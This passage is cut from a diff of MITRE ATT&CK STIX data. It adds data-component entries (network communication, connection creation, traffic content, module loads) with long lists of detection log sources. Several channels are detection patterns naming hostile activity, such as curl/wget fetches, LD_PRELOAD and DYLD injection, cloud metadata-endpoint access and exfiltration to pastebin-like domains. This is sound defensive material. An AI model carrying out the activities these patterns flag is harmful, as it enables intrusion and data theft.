+                            "name": "macos:unifiedlog",
+                            "channel": "dyld/unified log entries indicating image load from non-system paths"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "select: path LIKE '%/Library/%/*.dylib' OR '/tmp/*.dylib'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "dynamic loading of sleep-related functions or sandbox detection libraries"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "LD_PRELOAD Logging"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Dynamic Linking State"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "DYLD event subsystem"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Process linked with libcrypto.so making external connections"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process execution events with dylib load activity"
+                        },
+                        {
+                            "name": "linux:Sysmon",
+                            "channel": "EventCode=7"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "CLR Assembly creation, loading, or modification logs via MSSQL CLR integration"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process memory maps new dylib (dylib_load event)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Dylib loaded from abnormal location"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=3033"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=3063"
+                        },
+                        {
+                            "name": "auditd:MMAP",
+                            "channel": "load: Loading of libzip.so, libz.so, or libbz2.so by processes not normally associated with archiving"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Loading of libz.dylib, libarchive.dylib by non-standard applications"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "suspicious dlopen/dlsym usage in non-development processes"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Non-standard Office startup component detected (e.g., unexpected DLL path)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "mmap"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "unexpected module load"
+                        },
+                        {
+                            "name": "snmp:status",
+                            "channel": "Status change in cryptographic hardware modules (enabled -> disabled)"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "module load"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "delay/sleep library usage in user context"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "kmod"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem=com.apple.kextd"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "loading of unexpected dylibs compared to historical baselines"
+                        },
+                        {
+                            "name": "auditd:file-events",
+                            "channel": "open of suspicious .so from non-standard paths"
+                        },
+                        {
+                            "name": "macos:syslog",
+                            "channel": "DYLD_INSERT_LIBRARIES anomalies"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "dmesg"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_KEXTLOAD"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "module load or memory map path"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launch and dylib load"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Processes linked with libssl/libcrypto performing network activity"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-ImageLoad",
+                            "channel": "provider: Unsigned/user-writable image loads into msbuild.exe"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "DexClassLoader/PathClassLoader load attempt from non-standard path or recently created file"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Short burst of file I/O followed by JNI/dlopen of a newly created .so"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "dyld: dlopen/dyld_cache load from non-standard app-writable path"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "DexClassLoader/PathClassLoader loading from app-writable path OR reflective defineClass on byte[] payload"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "dlopen/image load from app-writable path (tmp, Caches) outside bundled resources"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "DexClassLoader|PathClassLoader load from app-writable path OR dlopen of a freshly created .so"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.778000+00:00\", \"old_value\": \"2026-01-29 17:21:27.873000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0016\", \"old_value\": \"https://attack.mitre.org/data-components/DC0016\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-03-13 19:59:42.141000+00:00",
+                    "modified": "2026-05-12 15:12:00.774000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0113",
+                            "external_id": "DC0113"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Network Communication",
+                    "description": "Network Communication captures outbound or inbound communication initiated by an application or mobile device, including the domains contacted, protocols used, and session metadata associated with the communication.\n\nMonitoring network communication enables defenders to identify command-and-control traffic, data exfiltration, or suspicious communication patterns originating from mobile applications.\n\nExamples\n\n- Connections to previously unseen domains\n- Repeated communication with suspicious infrastructure\n- Communication immediately following application installation\n\nCollection Methods\n\n- Mobile VPN telemetry\n- Secure web gateway logs\n- Network detection and response (NDR)\n- Mobile EDR network monitoring\n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Application Vetting",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.774000+00:00\", \"old_value\": \"2026-03-11 15:52:58.538000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0113\", \"old_value\": \"https://attack.mitre.org/data-components/DC0113\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.274000+00:00",
+                    "modified": "2026-05-12 15:12:00.770000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0082",
+                            "external_id": "DC0082"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Network Connection Creation",
+                    "description": "The initial establishment of a network session, where a system or process initiates a connection to a local or remote endpoint. This typically involves capturing socket information (source/destination IP, ports, protocol) and tracking session metadata. Monitoring these events helps detect lateral movement, exfiltration, and command-and-control (C2) activities.\n\n*Data Collection Measures:*\n\n- Windows:\n    - Event ID 5156 \u2013 Filtering Platform Connection - Logs network connections permitted by Windows Filtering Platform (WFP).\n    - Sysmon Event ID 3 \u2013 Network Connection Initiated - Captures process, source/destination IP, ports, and parent process.\n- Linux/macOS:\n    - Netfilter (iptables), nftables logs - Tracks incoming and outgoing network connections.\n    - AuditD (`connect` syscall) - Logs TCP, UDP, and ICMP connections.\n    - Zeek (`conn.log`) - Captures protocol, duration, and bytes transferred.\n- Cloud & Network Infrastructure:\n    - AWS VPC Flow Logs / Azure NSG Flow Logs - Logs IP traffic at the network level in cloud environments.\n    - Zeek (conn.log) or Suricata (network events) - Captures packet metadata for detection and correlation.\n- Endpoint Detection & Response (EDR):\n    - Detect anomalous network activity such as new C2 connections or data exfiltration attempts.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "log entries indicating network connection initiation on macOS"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "connect"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execs of chromium, google-chrome, firefox, libreoffice with http(s) in cmdline"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "connect/sendto"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open or connect syscalls on /tmp/ssh-* or $SSH_AUTH_SOCK"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket/connect with TLS context by unexpected process"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket/bind: New bind() to a previously closed port shortly after the sequence."
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "sendto/connect"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "outbound connections"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket/bind: Process binds to a new local port shortly after knock"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket/connect calls showing SSH processes forwarding arbitrary ports"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "openat,connect -k discovery"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Outbound connection to 169.254.169.254 from EC2 workload"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Large transfer volume (>20MB) from RDS IP range to external public IPs"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "High outbound traffic from new region resource"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Outbound connections to port 22, 3389"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Traffic observed on mirror destination instance"
+                        },
+                        {
+                            "name": "cni:netflow",
+                            "channel": "outbound connection to internal or external APIs"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "socket connect"
+                        },
+                        {
+                            "name": "esxi:esxupdate",
+                            "channel": "/var/log/esxupdate.log or /var/log/vmksummary.log"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "System service interactions"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Service initiated connections"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Service-Based Network Connection"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "protocol egress"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "network activity"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "network session initiation with external HTTPS services"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "family=AF_PACKET or protocol raw; process name not in allowlist."
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "network"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "postfix/smtpd"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "New Wi-Fi connection established or repeated association failures"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "linux:Sysmon",
+                            "channel": "EventCode=3, 22"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_CONNECT"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events/socket_events"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "execution of trusted tools interacting with external endpoints"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "launchd or network_events"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events + launchd"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events, socket_events"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "CONNECT: Long-lived connections from remote-control parents to external IPs/domains"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "connection attempts"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "connection open"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "network connection events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "First outbound connection from the same PID/user shortly after an inbound trigger."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "network sessions initiated by remote desktop apps"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Inbound connections to VNC/SSH ports"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "network"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Outbound Traffic"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "networkd or socket"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream network activity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Association and authentication events including failures and new SSIDs"
+                        },
+                        {
+                            "name": "Network",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "networkdevice:Flow",
+                            "channel": "Traffic from mirrored interface to mirror target IP"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Dynamic route changes"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "web domain alerts"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "New outbound connection from Safari/Chrome/Firefox/Word"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Outbound connections from newly spawned child processes or from the browser to uncommon endpoints or on anomalous ports"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Outbound connection after script or installer launch"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "Outbound Connections"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "proxy or TLS inspection logs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New TCP/443 or TCP/80 to domain not previously seen for the user/host"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound connection to *.tunnels.api.visualstudio.com or *.devtunnels.ms"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Connections to *.devtunnels.ms or tunnels.api.visualstudio.com"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTPs connection to tunnels.api.visualstudio.com"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound or inbound TFTP file transfers of ROMMON or firmware binaries"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "connection: TCP connections to ports 139/445 to multiple hosts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "connection: SMB connections to multiple internal hosts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound HTTP/S initiated by newly installed interpreter process"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "outbound connections to RMM services or to unusual destination ports"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Multiple failed connections (conn_state=REJ/S0 or history has 'R') across distinct ports from the same src_ip followed by success to a specific port."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Sequence of REJ/S0 then SF success from same src_ip within TimeWindow."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Series of denied/closed flows to distinct ports then success to mgmt port from same src_ip within TimeWindow."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound traffic spike through formerly blocked ports/subnets following config change"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New egress to Internet by the same UID/host shortly after terminal exec"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "connection: Inbound connections to SSH or VPN ports"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "External access to container ports (2375, 6443)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "remote access"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound Connections"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "connection attempts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "High-volume or repeated SNMP GETBULK/GETNEXT queries from untrusted or external IPs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "outbound connections from host during or immediately after image build"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "new outbound connection from browser/office lineage"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "new outbound connection from exploited lineage"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Multiple failed connections to closed ports (history contains 'R' or conn_state in {REJ, S0}) followed by a successful handshake to a new port from same src within TimeWindowKnock"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Closed-port hits followed by success from same src_ip"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Port-knock pattern from one src to device unicast,broadcast,network addresses on same port within TimeWindowKnock"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unexpected inbound/outbound TFTP traffic for device image files"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unexpected or unauthorized inbound connections to SNMP, NETCONF, or RESTCONF services"
+                        },
+                        {
+                            "name": "snmp:access",
+                            "channel": "GETBULK/GETNEXT requests for OIDs associated with configuration parameters"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Bits-Client/Operational",
+                            "channel": "BITS job lifecycle events such as job create/modify/transfer/complete and URL/remote name fields"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-WLAN-AutoConfig",
+                            "channel": "EventCode=8001, 8002, 8003"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=5156, 5157"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=3, 22"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=8001"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.770000+00:00\", \"old_value\": \"2026-04-23 18:37:33.992000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.274000+00:00",
+                    "modified": "2026-05-12 15:12:00.771000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0085",
+                            "external_id": "DC0085"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Network Traffic Content",
+                    "description": "The full packet capture (PCAP) or session data that logs both protocol headers and payload content. This allows analysts to inspect command and control (C2) traffic, exfiltration, and other suspicious activity within network communications. Unlike metadata-based logs, full content analysis enables deeper protocol inspection, payload decoding, and forensic investigations.\n\n*Data Collection Measures:*\n\n- Network Packet Capture (Full Content Logging)\n    - Wireshark / tcpdump / tshark\n        - Full packet captures (PCAP files) for manual analysis or IDS correlation. `tcpdump -i eth0 -w capture.pcap`\n    - Zeek (formerly Bro)\n        - Extracts protocol headers and payload details into structured logs. `echo \"redef Log::default_store = Log::ASCII;\" > local.zeek | zeek -Cr capture.pcap local.zeek`\n    - Suricata / Snort (IDS/IPS with PCAP Logging)\n        - Deep packet inspection (DPI) with signature-based and behavioral analysis. `suricata -c /etc/suricata/suricata.yaml -i eth0 -l /var/log/suricata`\n- Host-Based Collection\n    - Sysmon Event ID 22 \u2013 DNS Query Logging, Captures DNS requests made by processes, useful for detecting C2 domains.\n    - Sysmon Event ID 3 \u2013 Network Connection Initiated, Logs process-to-network connection relationships.\n    - AuditD (Linux) \u2013 syscall=connect, Monitors outbound network requests from processes. `auditctl -a always,exit -F arch=b64 -S connect -k network_activity`\n- Cloud & SaaS Traffic Collection\n    - AWS VPC Flow Logs / Azure NSG Flow Logs / Google VPC Flow Logs, Captures metadata about inbound/outbound network traffic.\n    - Cloud IDS (AWS GuardDuty, Azure Sentinel, Google Chronicle), Detects malicious activity in cloud environments by analyzing network traffic patterns.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "ALB:HTTPLogs",
+                            "channel": "AWS ALB/ELB/GCP/Azure Application Gateway HTTP logs with unusual methods, long URIs, serialized payloads, 4xx/5xx bursts"
+                        },
+                        {
+                            "name": "apache:access_log",
+                            "channel": "Unusual HTTP POST or PUT requests to paths such as '/uploads/', '/admin/', or CMS plugin folders"
+                        },
+                        {
+                            "name": "API:ConfigRepoAudit",
+                            "channel": "Access to configuration repository endpoints, unusual enumeration requests or mass downloads"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "setsockopt, ioctl modifying ARP entries"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Traffic between instances"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Large volume of malformed or synthetic payloads to application endpoints prior to failure"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Unusual volume of data transferred from S3 storage endpoints to non-corporate IPs"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "High volume internal-to-internal IP transfer or cross-account cloud transfer"
+                        },
+                        {
+                            "name": "azure:activity",
+                            "channel": "networkInsightsLogs"
+                        },
+                        {
+                            "name": "azure:vpcflow",
+                            "channel": "HTTP requests to 169.254.169.254 or Azure Metadata endpoints"
+                        },
+                        {
+                            "name": "container:proxy",
+                            "channel": "outbound/inbound network activity from spawned pods"
+                        },
+                        {
+                            "name": "docker:events",
+                            "channel": "remote API calls to /containers/create or /containers/{id}/start"
+                        },
+                        {
+                            "name": "docker:stats",
+                            "channel": "unusual network TX/RX byte deltas"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "Process within container accesses link-local address 169.254.169.254"
+                        },
+                        {
+                            "name": "EDR:hunting",
+                            "channel": "Advanced Hunting: DeviceProcessEvents + DeviceNetworkEvents"
+                        },
+                        {
+                            "name": "esxcli:network",
+                            "channel": "Socket sessions with randomized payloads inconsistent with TLS"
+                        },
+                        {
+                            "name": "esxcli:network",
+                            "channel": "listening sockets bound to non-standard ports"
+                        },
+                        {
+                            "name": "esxcli:network",
+                            "channel": "listening sockets bound with non-standard encapsulated protocols"
+                        },
+                        {
+                            "name": "esxcli:network",
+                            "channel": "Socket inspection showing RSA key exchange outside baseline endpoints"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Network activity"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Outbound traffic using encoded payloads post-login"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "HTTPS POST connections to webhook endpoints"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Inspection of sockets showing encrypted sessions from non-baseline processes"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "HTTPS POST connections to pastebin-like domains"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "network stack module logs"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Suspicious traffic filtered or redirected by VM networking stack"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "VMCI syslog entries"
+                        },
+                        {
+                            "name": "esxi:vob",
+                            "channel": "NFS/remote access logs"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-NDIS-PacketCapture",
+                            "channel": "TLS Handshake/Network Flow"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-WinINet",
+                            "channel": "HTTPS Inspection"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-WinINet",
+                            "channel": "WinINet API telemetry"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "network.query*"
+                        },
+                        {
+                            "name": "gcp:vpcflow",
+                            "channel": "first 5m egress to unknown ASNs"
+                        },
+                        {
+                            "name": "IDS:TLSInspection",
+                            "channel": "Malformed certs, incomplete asymmetric handshakes, or invalid CAs"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Per-app VPN flow logging indicating opaque/archived payload transfer preceding local decode"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Per-App VPN flow with code-like content types (application/octet-stream, application/zip, text/javascript, application/x-mach-o)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "WKWebView navigation to domain visually similar to target brand (IDN/punycode/alike score)"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Query to suspicious domain with high entropy or low reputation"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "curl|wget|python .*http"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Unexpected SQL or application log entries showing tampered or malformed data"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Integrity mismatch warnings or malformed packets detected"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "DNS response IPs followed by connections to non-standard calculated ports"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Multiple NXDOMAIN responses and high entropy domains"
+                        },
+                        {
+                            "name": "m365:office",
+                            "channel": "External HTTP/DNS connection from Office binary shortly after macro trigger"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process + network metrics correlation for bandwidth saturation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "DNS query with pseudo-random subdomain patterns"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "network flow"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "curl|osascript.*open location"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem: com.apple.network"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "open URL|clicked link|LSQuarantineAttach"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Connections to suspicious domains with mismatched certificate or unusual patterns"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "HTTP POST with encoded content in user-agent or cookie field"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Suspicious outbound HTTPS requests to domains flagged as newly registered or untrusted after spearphishing message interaction"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream (subsystem: com.apple.system.networking)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Encrypted connection with anomalous payload entropy"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Rapid incoming TLS handshakes or HTTP requests in quick succession"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "network, socket, and http logs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "DNS responses followed by connections to ports outside standard ranges"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Persistent outbound traffic to mining domains"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Encrypted session initiation by unexpected binary"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "eventMessage = 'promiscuous'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "outbound HTTPS connections to code repository APIs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "eventMessage = 'open', 'sendto', 'connect'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "dns-sd, mDNSResponder, socket activity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process + network activity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem=com.apple.WebKit"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem: com.apple.WebKit or com.apple.WebKit.Networking"
